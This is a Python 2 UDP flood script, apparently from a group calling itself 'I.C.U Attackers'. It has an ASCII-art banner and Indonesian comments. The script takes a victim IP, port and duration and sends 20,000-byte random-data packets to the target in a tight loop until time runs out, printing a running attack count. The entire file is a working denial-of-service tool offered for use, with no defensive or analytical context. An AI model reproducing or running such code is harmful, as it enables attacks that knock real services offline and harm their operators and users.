import time
import socket
import random
import sys
def usage():
        print "###############################################################################"
        print "\033[1;32m#  ____  _   _      _      _____ _____  _    ____ _  _______ ____  ____        #"
        print "#  |_ _| / ___|| | | |    / \|_   _|_   _|/ \  / ___| |/ / ____|  _ \/ ___|    #"
        print "#   | | | |    | | | |   / _ \ | |   | | / _ \| |   | ' /|  _| | |_) \___ \    #"
        print "#   | | | |___ | |_| |  / ___ \| |   | |/ ___ \ |___| . \| |___|  _ < ___) |   #"
        print "#  |___(_)____(_)___/  /_/   \_\_|   |_/_/   \_\____|_|\_\_____|_| \_\____/    #"
        print "#----------------------[\033[1;33mINDONESIA~CYBER~UNDERGROUND\033[1;32m]---------------------------#"
        print "#              \033[1;91mTo-run: " "python2 ddos "  "<ip> <port> <packet> \033[1;32m                      #"
        print "#                                                                              #"
        print "#\033[1;32m##########################\033[1;33m  Creator:Jhoda_akses777  \033[1;32m###########################"
        print "################################################################################"
def flood(victim, vport, duration):
    # Support us yaakk... :)
    # Okey Jadi disini saya membuat server, Ketika saya memanggil "SOCK_DGRAM" itu  menunjukkan  UDP type program
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # 20000 representasi satu byte ke server
    bytes = random._urandom(20000)
    timeout =  time.time() + duration
    sent = 3000

    while 1:
        if time.time() > timeout:
            break
        else:
            pass
        client.sendto(bytes, (victim, vport))
        sent = sent + 1
        print "\033[1;33mI.C.U~Ready \033[1;32m%s \033[1;91mattack \033[1;32m%s \033[1;91mto port \033[1;32m%s \033[1;93m~~~~~~> I.C.U ATTACKERS"%(sent, victim, vport)
def main():
    print len(sys.argv)
    if len(sys.argv) != 4:
        usage()
    else:
        flood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))

if __name__ == '__main__':
    main()

